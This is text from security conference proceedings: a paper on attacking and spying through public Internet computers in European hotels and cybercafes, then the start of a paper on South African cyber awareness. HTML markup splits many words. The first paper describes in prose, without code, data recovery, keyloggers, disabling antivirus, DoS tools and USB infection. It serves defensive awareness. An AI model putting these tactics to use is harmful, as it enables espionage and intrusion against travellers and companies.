Dur<strong>in</strong>g six months, we have analyzed the security of many public/open computer spaces <strong>in</strong> Europe<br />
(ma<strong>in</strong>ly France, Belgium, Luxembourg, Germany, Greece and The Netherlands; for a grand total of 247<br />
computers analyzed) and tried to th<strong>in</strong>k as terrorists or spies would. As a general conclusion, we have<br />
made the follow<strong>in</strong>g dramatic review:<br />
The overall security of those open/public spaces is extremely weak. No control is even performed to<br />
monitor who is us<strong>in</strong>g the Internet facilities and what k<strong>in</strong>d of actions is performed. Hence mount<strong>in</strong>g<br />
national or worldwide attacks through Internet is more than easy. In a context of terrorism, this can<br />
have a dramatic impact.<br />
A vast of majority of users is not simple users or <strong>in</strong>nocent tourists but on the contrary they are<br />
decision-makers, employees of large firms who moreover are the custodians of high power or of high<br />
responsibility (CEO, CSO or CTO of large companies...) or even of private data of third-party people<br />
(lawyers, physicians...). We have observed that most of the time they violate one or more (computer)<br />
basic security rules both regard<strong>in</strong>g the data security and their own company computer network.<br />
Target<strong>in</strong>g one or more companies to perform <strong>in</strong>telligence operations aga<strong>in</strong>st them, mount <strong>in</strong>ternal<br />
attacks aga<strong>in</strong>st their networks and computer resources while bypass<strong>in</strong>g many of their protection is<br />
very easy as well. In particular, we have observed that many decision-makers are us<strong>in</strong>g those public<br />
spaces <strong>in</strong> a very unsecure way thus jeopardiz<strong>in</strong>g their company’s assets and existence.<br />
In this paper, we present the detailed results of this field study with a lot of illustrative examples and<br />
attack scenario we have tested or explored. We draw a number of recommendations towards more<br />
security.<br />
106
Eric Filiol<br />
The paper is organized as follows. Section 2 will first present the context, the protocols and tools of our<br />
study. Section 3 will report the level of (<strong>in</strong>) security we have observed. As a general conclusion, the<br />
computer security level is very low. Section 4 will then address the issue of <strong>in</strong>telligence gather<strong>in</strong>g <strong>in</strong> those<br />
open/public computer spaces. We will show how much sensitive the data we have collected were.<br />
Moreover, we will show how the data collected can be misused to prepare further targeted computer<br />
attacks aga<strong>in</strong>st companies. Section 5 will then expla<strong>in</strong> how to exploit and to pervert the computer<br />
(<strong>in</strong>)security <strong>in</strong> place to prepare and mount <strong>in</strong>direct computer attacks aga<strong>in</strong>st remote and sensitive<br />
computer facilities like those <strong>in</strong> critical <strong>in</strong>frastructure, protected company LAN... Section 6 will present an<br />
overall scenario based on our different results to summarize most of our results. We will then conclude by<br />
address<strong>in</strong>g the protection issues aga<strong>in</strong>st that particular risk.<br />
2. Context, protocol and tools of the study<br />
2.1 The “theoretical” context<br />
To evaluate the security risk, a number of Information <strong>Security</strong> Management Systems (ISMS) and<br />
standards exist. Among them, the widely used are:<br />
French Government EBIOS risk analysis method (DCSSI, 2000) which allows evaluat<strong>in</strong>g and act<strong>in</strong>g<br />
on risks relative to <strong>in</strong>formation systems security, and proposes a security policy adapted to the needs<br />
of an organization. The five steps of the EBIOS method are circumstantial study, security<br />
requirements, risk study, identification of security goals, and determ<strong>in</strong>ation of security requirements.<br />
The “ISO27k” (ISO/IEC 27000-series, ) standards which provide good practice guidance on<br />
design<strong>in</strong>g, implement<strong>in</strong>g and audit<strong>in</strong>g Information <strong>Security</strong> Management Systems to protect the<br />
confidentiality, <strong>in</strong>tegrity and availability of the <strong>in</strong>formation on which we all depend.<br />
The ma<strong>in</strong> drawback and limitation with respect to those security and risk analysis methods lie <strong>in</strong> the fact<br />
that their approach is far too much system/<strong>in</strong>frastructure centric. Moreover they consider only technical<br />
aspects and the “<strong>in</strong>telligence” approach is not taken <strong>in</strong>to account. The attacker’s vision and approaches<br />
are never taken <strong>in</strong>to account. More worry<strong>in</strong>gly, the enlarged environment of the systems/<strong>in</strong>frastructures<br />
analyzed - especially <strong>in</strong> its dynamic evolution - is almost never considered.<br />
Our study aims at provid<strong>in</strong>g a different view. Our goal is to show that the attacker’s vision <strong>in</strong> a context of<br />
<strong>in</strong>telligence operations, cyberwarfare preparation and plann<strong>in</strong>g has a tremendous impact on the overall<br />
security.<br />
2.2 Study protocol and tools<br />
The purpose of this study, which has been conducted from May 2010 to November 2010, for the benefit<br />
of the SECALYS Ltd 1 – a company specialized <strong>in</strong> bus<strong>in</strong>ess and economic <strong>in</strong>telligence -- was to determ<strong>in</strong>e<br />
the factors and the risk level related to the use of Internet access <strong>in</strong> public areas and open (Internetcafes,<br />
Internet computer <strong>in</strong> hotels, airport, railway station, <strong>in</strong>ternational conference lounges…). The idea<br />
was to stand <strong>in</strong> the shoes of an attacker (a spy, a mafia group member, a terrorist...) who wishes to<br />
collect <strong>in</strong>telligence or target<strong>in</strong>g a particular company (<strong>in</strong>dustrial espionage, cyber attacks...). In particular,<br />
the different approaches considered have been keep<strong>in</strong>g <strong>in</strong> m<strong>in</strong>d that the word "<strong>in</strong>telligence" conta<strong>in</strong>s two<br />
ma<strong>in</strong> ideas: there is a passive component (the <strong>in</strong>formation gather<strong>in</strong>g which consists <strong>in</strong> collect<strong>in</strong>g more or<br />
less sensitive data <strong>in</strong> more or less open environments) and an active and/or offensive component<br />
(<strong>in</strong>trusion, compromise, attack, physical human operations ...). It is important to keep <strong>in</strong> m<strong>in</strong>d this duality<br />
of action is most of the time often forgotten <strong>in</strong> the buzz term of ``economic <strong>in</strong>telligence’’. Intelligence<br />
techniques and operations do not care with Ethics, difficulty or any k<strong>in</strong>d of limitations or regulations. It is<br />
only consider<strong>in</strong>g efficiency and success (Qiao & Wang, 1999).<br />
The level of the analyses and computer actions/operations that we have undertaken, tested or planned<br />
(see hereafter) is about to level 3 on a scale of complexity rang<strong>in</strong>g from 1 to 10. There are therefore<br />
somewhat unsophisticated techniques, that can be easily performed by a large number of attackers<br />
hav<strong>in</strong>g rather limited knowledge <strong>in</strong> computer hack<strong>in</strong>g and attacks (script kiddies, would-be spies work<strong>in</strong>g<br />
for private <strong>in</strong>telligence companies...). Our study has shown that more sophisticated techniques are bound<br />
to always succeed.<br />
Alongside to a few home-made, custom dedicated audit<strong>in</strong>g software (but equivalent one can be found<br />
easily on the Internet), we have used a rather limited kit of tools:<br />
1 http :// www.secalys.fr<br />
107
A USB stick conta<strong>in</strong><strong>in</strong>g portable applications:<br />
Eric Filiol<br />
Efficient yet light antivirus software (CureIt 2 ). This tool has been chosen s<strong>in</strong>ce aside a very good<br />
detection rate, it is the most transparent one with respect to the system. So whenever another<br />
security software (e.g. an alternative antivirus software), us<strong>in</strong>g CureIt does neither trigger any alert<br />
nor cause system slowdown or <strong>in</strong>stability.<br />
Powerful, multi-format recovery software (deleted or formatted data). We have considered PhotoRec,<br />
a free, open tool written by Christophe Grenier 3 which is the most powerful software ever written <strong>in</strong><br />
this category.<br />
A hex editor (Filealyzer 4 ) with content analysis and <strong>in</strong>terpretation capabilities.<br />
A set of hardware keylogger (PS2, USB...).<br />
To evaluate the offensive part, we analyzed the environment of computer security <strong>in</strong> place (nature and<br />
versions of protection software <strong>in</strong>stalled, configuration sett<strong>in</strong>gs...) and tested the efficiency of the possible<br />
attacks by perform<strong>in</strong>g them <strong>in</strong> our laboratory with real malware (malware, shellcode, exploits...) on exact<br />
clones of the real computers. However, to ensure the operational reality of those attacks <strong>in</strong> situ, we<br />
actually realized data recovery steps and operations to access to adm<strong>in</strong>istrator and system privileges.<br />
Sensitive data have been deleted after the study.<br />
In each place, where a large number of computer ware available (like <strong>in</strong> cyber cafes), we analyzed a<br />
random subset of those computers (and not only a s<strong>in</strong>gle one) and thus have a more operational po<strong>in</strong>t of<br />
view (us<strong>in</strong>g sampl<strong>in</strong>g technique).<br />
For a few computers that have proved to be <strong>in</strong>terest<strong>in</strong>g with regards to the data collected or the frequent<br />
regular users, we <strong>in</strong>stalled alternative antivirus software (e.g. Dr Web) <strong>in</strong> dynamic mode (after<br />
deactivat<strong>in</strong>g the one <strong>in</strong> place, if any). It would have been possible to <strong>in</strong>stall other malware (key logger<br />
software, Trojan horses) similarly ... We then returned to analyze the test results at different time<br />
<strong>in</strong>tervals.<br />
We sought to evaluate the follow<strong>in</strong>g po<strong>in</strong>ts:<br />
First, can we recover data (still present or deleted) from previous users’ sessions? Can these data be<br />
sensitive or confidential (<strong>in</strong> other words, are those computers used ma<strong>in</strong>ly for professional purposes<br />
or not)? What is the level of sensitiveness of the date collected or recovered?<br />
How secure are these open Internet computers (antivirus, configuration of hidden areas, system<br />
directory accessible or not...)? In other words, can we carry out attacks from those computers and<br />
even worse, can we ``reconfigure/change” them <strong>in</strong> such a way we can target, <strong>in</strong>fect and spy users<br />
who use the computer after we did?<br />
For this last po<strong>in</strong>t (offensive and targeted action aga<strong>in</strong>st a given user/company), it is worth stress<strong>in</strong>g on<br />
the fact that a necessary, human classical <strong>in</strong>telligence analysis must be performed to optimize this step.<br />
This particular po<strong>in</strong>t is discussed <strong>in</strong> Section 5.<br />
3. The actual computer security of open/public computer spaces<br />
We observed a total lack of security <strong>in</strong> all computers we have analyzed. The few configurations and<br />
security software <strong>in</strong> place absolutely do not protect these systems aga<strong>in</strong>st attacker of low or medium<br />
technical level. The systems are often equipped with an antivirus (about 75 % of computers are<br />
protected) which is often <strong>in</strong>visible but ill configured: for <strong>in</strong>stance we managed systematically to access<br />
scan logs, or we could easily un<strong>in</strong>stall them or manipulate/change their configuration (iAWACS, 2009 &<br />
2010). The overall distribution of the antivirus found on systems is given <strong>in</strong> Figure 1. The most important<br />
po<strong>in</strong>t is that the degree of protection is <strong>in</strong>versely proportional to the percentage distribution of antivirus<br />
products. In this respect, McAfee and Symantec are the less efficient products (iAWACS, 2009 & 2010)<br />
while be<strong>in</strong>g the most widely <strong>in</strong>stalled.<br />
In a significant number of <strong>in</strong>stances, CureIt detected <strong>in</strong>fections where the antivirus <strong>in</strong> place failed<br />
(especially with respect to Conficker variants). It is also possible, by analyz<strong>in</strong>g scan logs to determ<strong>in</strong>e<br />
with great precision, what k<strong>in</strong>d of antivirus protection is <strong>in</strong>stalled on users' corporate network (or is not<br />
2 http://www.freedrweb.com/cureit/?lng=en<br />
3 http://www.cgsecurity.org/wiki/PhotoRec_FR<br />
4 http://www.safer-network<strong>in</strong>g.org/fr/filealyzer/<strong>in</strong>dex.html<br />
108
Eric Filiol<br />
<strong>in</strong>stalled). For example, the analysis of the meta-data <strong>in</strong> Office documents showed that <strong>in</strong>fected<br />
documents were opened on a mach<strong>in</strong>e <strong>in</strong> a company LAN without be<strong>in</strong>g detected. All this <strong>in</strong>formation is<br />
critical dur<strong>in</strong>g the <strong>in</strong>telligence step to prepare a computer network operation (Filiol, 2009).<br />
Where we have <strong>in</strong>stalled an alternative antivirus (on computers which are regularly used by the same<br />
people; see Sections 4 and 5), we managed to <strong>in</strong>fer other critical <strong>in</strong>formation about antivirus software <strong>in</strong><br />
place <strong>in</strong> their bus<strong>in</strong>ess or home computer. It is important to remember that home comput<strong>in</strong>g is the first<br />
po<strong>in</strong>t of entry of attacks aga<strong>in</strong>st a corporate network (Filiol, 2009).<br />
Figure 1: Distribution of antivirus software <strong>in</strong>stalled <strong>in</strong> open/public Internet accesses (<strong>in</strong> %; total number<br />
of computers analyzed with an antivirus <strong>in</strong>stalled = 186)<br />
The global protection (security software, visibility and strength of the configuration <strong>in</strong> terms of security) is<br />
bad or even almost non-existent. It is easy <strong>in</strong> many ways (without even us<strong>in</strong>g vulnerabilities or<br />
sophisticated codes) to ga<strong>in</strong> system privileges and then <strong>in</strong>stall malware that will <strong>in</strong>fect the subsequent<br />
users. Virtually no action is taken aga<strong>in</strong>st the <strong>in</strong>stallation of key-logger hardware (it is even possible to<br />
easily retrieve adm<strong>in</strong> password which was played only partially played to stay <strong>in</strong> a strictly legal context;<br />
for ethical reasons we will not give the method here). It follows that <strong>in</strong>fect<strong>in</strong>g users and their company<br />
network, <strong>in</strong> an anonymous and untraceable way is more than easy. Launch<strong>in</strong>g an attack with malware<br />
like Stuxnet or Conficker (and so falsely <strong>in</strong>crim<strong>in</strong>ate a country or a company) is very easy. Additionally we<br />
have observed that launch<strong>in</strong>g portable applications (from a USB key) is also very easy.<br />
4. Intelligence gather<strong>in</strong>g operations <strong>in</strong> open/public computer spaces<br />
Collect<strong>in</strong>g (still present on the hard disk) or recover<strong>in</strong>g (when erased) data from previous users’ session<br />
is very easy, even when some technical measure has been taken (like <strong>in</strong>visible or hidden directories). We<br />
were able to recover several gigabytes of data. What is astonish<strong>in</strong>g is the sensitivity of the data found:<br />
economic data (f<strong>in</strong>ancial audits of groups or corporations, for example), political data (eg, a document of<br />
the High Court of Justice of Europe, see Figure 2), legal data, private data (we found a complete set of<br />
document enabl<strong>in</strong>g to steal and usurp identities: tax notices, passports, identity cards...) and even<br />
sometimes confidential documents.<br />
The analysis of metadata for these documents has resulted <strong>in</strong> the recovery of important technical<br />
<strong>in</strong>formation. In some cases, former modifications <strong>in</strong> documents (e.g. PDF) can even be recovered s<strong>in</strong>ce<br />
they are kept hidden <strong>in</strong> the file. It is clear that many users are often professionals – more than orig<strong>in</strong>ally<br />
suspected -- with heavy responsibilities and decision mak<strong>in</strong>g. From this po<strong>in</strong>t of view top luxury hotels<br />
(4/5 stars), cyber cafes near tra<strong>in</strong> stations or airports are the most productive. The analysis of application<br />
history (browsers, logs of applications or of the operat<strong>in</strong>g system itself...) can also collect a lot of<br />
<strong>in</strong>formation.<br />
109
Eric Filiol<br />
Figure 2: Document of the High Court of Justice of Europe (Kononov vs Letonia).<br />
5. Exploitation of open/public computer spaces <strong>in</strong>security<br />
These open/public Internet places are also a tremendous threat <strong>in</strong>sofar as they can easily be used to<br />
launch attacks. In general, no control is made and access to computers is so completely anonymous. In<br />
hotels or <strong>in</strong>ternational conferences, we were able to connect often without be<strong>in</strong>g a customer. There is<br />
often no log<strong>in</strong> banner, or, if any, these banners are easy to get around: just go to the welcome desk of the<br />
hotel and pretend to be a guest <strong>in</strong> the hotel and so get the suitable credentials. A step of social<br />
eng<strong>in</strong>eer<strong>in</strong>g and traditional <strong>in</strong>telligence may also suffice.<br />
In Internet cafes, the presence of CCTV is rare and when any, there is a suitable garment suffices to hide<br />
one’s face (hood or cap) does not trigger any reaction. Hence launch<strong>in</strong>g a global attack type Confiker so<br />
totally anonymous is worry<strong>in</strong>gly easy. Conduct an attack aga<strong>in</strong>st a country while falsely <strong>in</strong>crim<strong>in</strong>at<strong>in</strong>g a<br />
third-party country is someth<strong>in</strong>g feasible <strong>in</strong> this context: just use the <strong>in</strong>ternet cafes of the country you want<br />
to frame. We have even verified that it was even possible to <strong>in</strong>stall very well-known DoS software (Denial<br />
of Service) like LOIC (Low Orbit Ion Canon) <strong>in</strong> an <strong>in</strong>visible and persistent way (e.g. without be<strong>in</strong>g<br />
detected by any antivirus <strong>in</strong> place. The detection by the adm<strong>in</strong>ister supervision or by automated network<br />
security software occurred <strong>in</strong> a more or less long time (for our test we have attacked one of our server<br />
which has been set up especially for this test). Thus, by carefully calibrat<strong>in</strong>g a DoS tool like LOIC and<br />
carefully select<strong>in</strong>g a few Internet cafes, it is possible to plan and launch a distributed attack of relatively<br />
large magnitude. But the most serious concern deals with the possibility of targeted attacks aga<strong>in</strong>st<br />
companies. We have observed very <strong>in</strong>terest<strong>in</strong>g th<strong>in</strong>gs. Let us summarize the most significant ones.<br />
Surpris<strong>in</strong>gly users are wary<strong>in</strong>g more over WiFi connections - even when protected by crypto - that<br />
over open/public Internet access computers. The wired connection is seen as a (mislead<strong>in</strong>g)<br />
guarantee of security.<br />
The second po<strong>in</strong>t concerns the habits of users. Many makers use the same hotels (because of<br />
agreements between these hotels and their companies). It is therefore possible to study on an<br />
ongo<strong>in</strong>g basis over a long period of time. In the cyber cafes we found that users like to use always<br />
the same computer (when available).<br />
F<strong>in</strong>ally, the lack of real security makes possible to <strong>in</strong>stall whatever malicious software you want and<br />
take total control of all computers <strong>in</strong> a discreet way. It is so easy to turn all the computers <strong>in</strong> an<br />
<strong>in</strong>ternet cafe <strong>in</strong>to a m<strong>in</strong>i-botnet. It is also possible to <strong>in</strong>stall software that systematically perform a full<br />
image of any USB device connected (<strong>in</strong>clud<strong>in</strong>g empty spaces that are not so empty s<strong>in</strong>ce it conta<strong>in</strong>s<br />
deleted data).<br />
It is also possible to setup a full network connection towards any remote server. Then the attacker<br />
does no longer need to come back to the computers.<br />
6. Summary scenario<br />
In order to illustrate all this, let us consider the follow<strong>in</strong>g scenario. It is fictional <strong>in</strong> appearance only. In<br />
reality, he was <strong>in</strong>spired by what we observed dur<strong>in</strong>g our study and laboratory tests. From this po<strong>in</strong>t, it is<br />
particularly illustrative of what can be done.<br />
110
6.1 The tactic theme<br />
Eric Filiol<br />
Let us suppose that the WorldLeaderInManyTh<strong>in</strong>gs company – a non European <strong>in</strong>dustrial consortium --<br />
wants to take control over its commercial competitor the EuropeanLeaderInOneTh<strong>in</strong>g company. The<br />
latter is struggl<strong>in</strong>g to develop a high-technology product – called StarWay project-- <strong>in</strong> critical field for the<br />
European community which wants to equip Europe with its own system and therefore ga<strong>in</strong> its strategic<br />
<strong>in</strong>dependence. Indeed, Europe is currently depend<strong>in</strong>g on the WorldLeaderInManyTh<strong>in</strong>gs company’s<br />
country for that technology.<br />
EuropeanLeaderInOneTh<strong>in</strong>g’s eng<strong>in</strong>eers, its CEO and CTO are frequently visit<strong>in</strong>g European entities<br />
both <strong>in</strong> Brussels and Luxembourg. Upon failure on develop<strong>in</strong>g this sensitive technology, the company will<br />
face major f<strong>in</strong>ancial problems and is likely to look for <strong>in</strong>dustrial partnerships. They are always lodg<strong>in</strong>g <strong>in</strong><br />
the FourGoldenStar Hotel with which they have a commercial agreement.<br />
The deadl<strong>in</strong>e to deliver the technology is the end of November 2010. Then the <strong>in</strong>dustrial development<br />
must beg<strong>in</strong>.<br />
6.2 The course of events<br />
In March 2010, a major one-week meet<strong>in</strong>g <strong>in</strong> Brussels takes place with the European technical<br />
supervisors of the StarWay Project and the EuropeanLeaderInOneTh<strong>in</strong>g’s eng<strong>in</strong>eer team and<br />
executive staff. A number of critical issues are to be discussed.<br />
At the beg<strong>in</strong>n<strong>in</strong>g of April, the EuropeanLeaderInOneTh<strong>in</strong>g company suffers from a series of computer<br />
problems that jeopardize the project: data loss, development servers’ failure and unavailability... More<br />
worry<strong>in</strong>g, the bus<strong>in</strong>ess press and later the general press <strong>in</strong> Europe spread the news accord<strong>in</strong>g to which<br />
the StarWay Project will have to suffer from major delays and tremendous cost overruns. As a<br />
consequence, the EuropeanLeaderInOneTh<strong>in</strong>g company shares are suddenly down of nearly 30 %<br />
over the April month. The CTO is dismissed. The European commission asks for a f<strong>in</strong>ancial <strong>in</strong>vestigation<br />
and a technical evaluation of the situation. Two months later, an official announcement is made by the<br />
EC: the StarWay Project is moved back at least one year while an addition of 1.5 billion of euros to the<br />
project budget has to be made. The EuropeanLeaderInOneTh<strong>in</strong>g company shares are immediately<br />
plung<strong>in</strong>g after the annoucement (40 % down more). The company CEO is dismissed. A major crisis is<br />
about to strike the company. At the beg<strong>in</strong>n<strong>in</strong>g of september, the WorldLeaderInManyTh<strong>in</strong>gs company<br />
makes a takeover bid over the EuropeanLeaderInOneTh<strong>in</strong>g company. The shareholders massively<br />
accept and the takeover is a success. The European commission delayed the StarWay Project until<br />
further notice.<br />
6.3 Course of events analysis<br />
In reality all those events and the f<strong>in</strong>al outcome result from multi-level, multi-step computer <strong>in</strong>telligence<br />
and computer attacks by the WorldLeaderInManyTh<strong>in</strong>gs company aga<strong>in</strong>st the<br />
EuropeanLeaderInOneTh<strong>in</strong>g company. Its aim was first to get rid of a commercial competitor<br />
(commercial <strong>in</strong>terest) and second to make sure that the StarWay Project is questioned (strategic <strong>in</strong>terest<br />
for its home country). For that purpose, it has hired a few <strong>in</strong>telligence experts and hackers. We will call<br />
them the A-Team.<br />
In a first <strong>in</strong>telligence step, the A-Team has analyzed the habits of the EuropeanLeaderInOneTh<strong>in</strong>g<br />
company eng<strong>in</strong>eers and staff that regularly traveled and stay <strong>in</strong> Brussels and Luxembourg for the<br />
StarWay Project. The A-team quickly noticed that they were regularly us<strong>in</strong>g the wire <strong>in</strong>ternet accesses <strong>in</strong><br />
the Hotel bus<strong>in</strong>ess lounge or <strong>in</strong> the cyber cafe near the bar and restaurant they frequented downtown.<br />
Listen<strong>in</strong>g to their discussions, they determ<strong>in</strong>ed that the EuropeanLeaderInOneTh<strong>in</strong>g company CSO<br />
strongly forbade the use of wireless network. Tak<strong>in</strong>g control over the hotel and Internet cafe computers<br />
the A-team first <strong>in</strong>stalled computer surveillance. Hence it has been possible to ga<strong>in</strong> a precise <strong>in</strong>sight of<br />
the security <strong>in</strong> force <strong>in</strong> the EuropeanLeaderInOneTh<strong>in</strong>g company. The A-team manage to steal<br />
passwords of EuropeanLeaderInOneTh<strong>in</strong>g company email accounts, to collect a lot of sensitive<br />
<strong>in</strong>formation on their USB key (<strong>in</strong>clud<strong>in</strong>g deleted ones).<br />
In a second step the attack aga<strong>in</strong>st the EuropeanLeaderInOneTh<strong>in</strong>g company LAN network has been<br />
<strong>in</strong>itiated. USB keys used by their eng<strong>in</strong>eers and CTO have been <strong>in</strong>fected with malware that could not be<br />
detected by the antivirus <strong>in</strong> place). Infect<strong>in</strong>g Word and PDF documents was sufficient. A few days later,<br />
111
Eric Filiol<br />
when plug<strong>in</strong>g those USB keys to the LAN computers a sophisticated Trojan horse has been <strong>in</strong>stalled.<br />
The malware was able to bypass all protection <strong>in</strong> place <strong>in</strong>clud<strong>in</strong>g DMZ and firewalls protection. Then<br />
various attacks have been performed: StarWay Project data secure eras<strong>in</strong>g, theft or manipulation<br />
(<strong>in</strong>sertion of wrong technical data), server failure... In parallel, tak<strong>in</strong>g control over the email boxes, the Ateam<br />
organized the <strong>in</strong>formation leak and deception operations towards the press <strong>in</strong> such a way that it<br />
seems to come from disappo<strong>in</strong>ted EuropeanLeaderInOneTh<strong>in</strong>g company employees. The end of the<br />
story was noth<strong>in</strong>g but logical.<br />
7. Conclusion<br />
This scenario will probably appear artificial and exagerated. In fact it is not. This attack has been possible<br />
s<strong>in</strong>ce (too) many critical mistakes have been made by the EuropeanLeaderInOneTh<strong>in</strong>g company. The<br />
false sense of security given by ``antivirus able to detect 100% of known and unknown malware’’, by<br />
wired Internet connections... generally play aga<strong>in</strong>st the users. But <strong>in</strong> this case – as <strong>in</strong> many others – this<br />
attack has been possible due to a total lack of <strong>in</strong>telligence methods. Generally, users th<strong>in</strong>k that computer<br />
security is just a technical matter. It is not. It is only the very f<strong>in</strong>al end of a very long cha<strong>in</strong>.<br />
Critical employees of companies (eng<strong>in</strong>eers, CTO, CSO, CEO...) should be <strong>in</strong>structed with the<br />
aggressive methods that any of his competitors could or will use. They have to th<strong>in</strong>k <strong>in</strong> the same way that<br />
the attacker will. Otherwise they are dead. The use of open/public Internet access represents a maximum<br />
danger. No professional use should be allowed.<br />
More generally standards and security/risk analysis methods should evolve to take the new forthcom<strong>in</strong>g<br />
challenges with respect to system and network security. The attacker’s m<strong>in</strong>d and techniques, as well as<br />
the <strong>in</strong>telligence operations techniques should also enlarge our vision of what the security of critical<br />
systems and <strong>in</strong>frastructures really is. It is f<strong>in</strong>ally no longer possible to defend and protect without be<strong>in</strong>g<br />
aware how we can attack, destroy and pervert security.<br />
References<br />
DCSSI (2000) EBIOS : « Expression des Beso<strong>in</strong>s et Identification des Objectifs de Sécurité »<br />
http://www.ssi.gouv.fr/ebios<br />
International Standard Organization. ISO/IEC 27000-series security standards. http://www.iso27001security.com/<br />
Col. Qiao, L. and Wang X. (1999) “Unrestricted Warfare”. People Liberation Army. Litterature and Arts Publish<strong>in</strong>g<br />
House, Beij<strong>in</strong>g. [onl<strong>in</strong>e] http://www.terrorism.com/documents/TRC-Analysis/unrestricted.pdf<br />
Filiol E. (2009). Operational aspects of cyberwarfare or cyber-terrorist attacks: what a truly devastat<strong>in</strong>g attack could<br />
do. Proceed<strong>in</strong>gs of the 8th European Conference on Information Warfare and <strong>Security</strong> (ECIW 2009), Lisbon,<br />
Portugal, pp. 71—79.<br />
iAWACS (2009) PWN2RM Challenge http://www.esiea-recherche.eu/iawacs_2009.html<br />
iAWACS (2010) PWN2KILL Challenge http://www.esiea-recherche.eu/iawacs_2010.html<br />
Dechaux J., Filiol E. and Fiza<strong>in</strong>e J.-P. (2011). Pervert<strong>in</strong>g emails: a new dimention <strong>in</strong> Internet (<strong>in</strong>)security. To appear<br />
<strong>in</strong> Proceed<strong>in</strong>gs of the 10th European Conference on Information Warfare and <strong>Security</strong> (ECIW 2011), Tall<strong>in</strong>,<br />
Estonia, June 2011.<br />
112
Evaluat<strong>in</strong>g Cyber <strong>Security</strong> Awareness <strong>in</strong> South Africa<br />
Marthie Grobler 1 , Joey Jansen van Vuuren 1 and Jannie Zaaiman 2<br />
1 Council for Scientific and Industrial Research, Pretoria, South Africa<br />
2 University of Venda, South Africa<br />
mgrobler1@csir.co.za<br />
jjvvuuren@csir.co.za<br />
jannie.zaaiman@univen.ac.za<br />
Abstract: In many ways, the <strong>in</strong>ternet and cyber world is a dangerous place where <strong>in</strong>nocent users can <strong>in</strong>advertently<br />
fall prey to shrewd cyber crim<strong>in</strong>als. These dangers, comb<strong>in</strong>ed with a large portion of the South African population that<br />
has not had regular and susta<strong>in</strong>ed exposure to technology and broadband <strong>in</strong>ternet access, expose local communities<br />
to cyber threats. Research done by the Council for Scientific and Industrial Research and the University of Venda<br />
shows that these local communities are not empowered to deal with these threats. To prevent <strong>in</strong>nocent <strong>in</strong>ternet users<br />
from becom<strong>in</strong>g victims of cyber attacks, an <strong>in</strong>tensive awareness campaign is planned to educate novice <strong>in</strong>ternet and<br />
technology users with regard to basic security. The motivation for this awareness project is to educate all South<br />
Africans us<strong>in</strong>g the <strong>in</strong>ternet, <strong>in</strong> an attempt to strengthen the awareness level concern<strong>in</strong>g the South African network - if<br />
there are local communities that are not properly educated, their technology devices may rema<strong>in</strong> unprotected. This<br />
may leave the South African <strong>in</strong>ternet <strong>in</strong>frastructure vulnerable to attacks, pos<strong>in</strong>g a severe threat to national security.<br />
In this specific project, national security will be promoted through awareness tra<strong>in</strong><strong>in</strong>g focus<strong>in</strong>g on the newly released<br />
broadband capability and knowledge transfer with<strong>in</strong> rural communities. To evaluate the current level of cyber security<br />
awareness, a series of exploratory surveys have been distributed to less technologically resourced entities <strong>in</strong> rural<br />
and deep rural communities with<strong>in</strong> South Africa. By analys<strong>in</strong>g the results of the surveys, it is possible to benchmark<br />
the current level of awareness. These observations can then be extrapolated to the larger group of rural South<br />
African communities. The next stage of the awareness evaluation project is to develop cyber security awareness<br />
tra<strong>in</strong><strong>in</strong>g modules for the local communities <strong>in</strong> their native tongue, aimed to improve the current level of awareness.<br />
This paper discusses the preparation, evaluation and tra<strong>in</strong><strong>in</strong>g of South African rural communities with regard to cyber<br />
security awareness. Due to the networked nature of the <strong>in</strong>ternet, the level of awareness has an <strong>in</strong>fluenc<strong>in</strong>g impact on<br />
the global community. Thus, to ensure a safely protected South African network, it is necessary to target the<br />
communities that can <strong>in</strong>advertently leave the network vulnerable.<br />
Keywords: cyber security, awareness, rural communities, broadband, tra<strong>in</strong><strong>in</strong>g, South Africa<br />
1. Introduction<br />
Cyber space is a complex environment that can advance <strong>in</strong>dividuals’ experience of electronic dependent<br />
activities, but can also place these <strong>in</strong>dividuals and their respective nations <strong>in</strong> a vulnerable state. Cyber<br />
space, cyber awareness and cyber security play an important role <strong>in</strong> the onl<strong>in</strong>e experience of <strong>in</strong>dividuals,<br />
and need to be addressed accord<strong>in</strong>gly. The <strong>in</strong>ternet and cyber world is a dangerous place where<br />
<strong>in</strong>nocent users can <strong>in</strong>advertently fall prey to shrewd cyber crim<strong>in</strong>als. These dangers, comb<strong>in</strong>ed with a<br />
large portion of the South African population that has not had regular and susta<strong>in</strong>ed exposure to<br />
technology and broadband <strong>in</strong>ternet access, expose local communities to cyber threats.<br />
Research done by the Council for Scientific and Industrial Research (CSIR) and the University of Venda<br />
shows that these local communities are not empowered to deal with these threats. To prevent <strong>in</strong>nocent<br />
<strong>in</strong>ternet users from becom<strong>in</strong>g victims of cyber attacks, an <strong>in</strong>tensive awareness campaign is needed to<br />
educate novice <strong>in</strong>ternet and technology users with regard to basic security. The motivation for this<br />
awareness project is to educate all South Africans us<strong>in</strong>g the <strong>in</strong>ternet, <strong>in</strong> an attempt to strengthen the<br />
awareness level with regard to the South African network - if there are local communities that are not<br />
properly educated, their technology devices may rema<strong>in</strong> unprotected. This may leave the South African<br />
<strong>in</strong>ternet <strong>in</strong>frastructure vulnerable to attacks, pos<strong>in</strong>g a severe threat to national security. In this specific<br />
project, national security will be promoted through awareness tra<strong>in</strong><strong>in</strong>g focus<strong>in</strong>g on the newly released<br />
broadband capability and knowledge transfer with<strong>in</strong> rural communities.<br />
2. The impact of broadband penetration on National <strong>Security</strong><br />
With the impend<strong>in</strong>g <strong>in</strong>crease <strong>in</strong> broadband access <strong>in</strong> South Africa, an average citizen’s computer or<br />
identity could <strong>in</strong> future be used (with or without knowledge and consent) as a hub for launch<strong>in</strong>g cyber<br />
attacks on the rest of the world. The modern def<strong>in</strong>ition of national security <strong>in</strong>cludes human security, the<br />
security of the <strong>in</strong>dividual as well as the average citizen (Phahlamohlaka, 2008). Africa as a cont<strong>in</strong>ent<br />
recently had an <strong>in</strong>crease <strong>in</strong> broadband access from a previous 120 Gbps to 12 Tbps over two years.<br />
Although the level of cyber attacks from the cont<strong>in</strong>ent were very low, it could <strong>in</strong> future be used as a hub<br />
113
Marthie Grobler et al.<br />
for launch<strong>in</strong>g cyber warfare type attacks on the rest of the world. Research done by the United States’<br />
Naval Warfare Command <strong>in</strong>dicates that cyber developments moved the battlefield to the average<br />
citizen’s home: attackers could take over a new computer with<strong>in</strong> 30 seconds after first connection to the<br />
<strong>in</strong>ternet (Jansen van Vuuren, Phahlamohlaka & Brazzoli, 2010).<br />
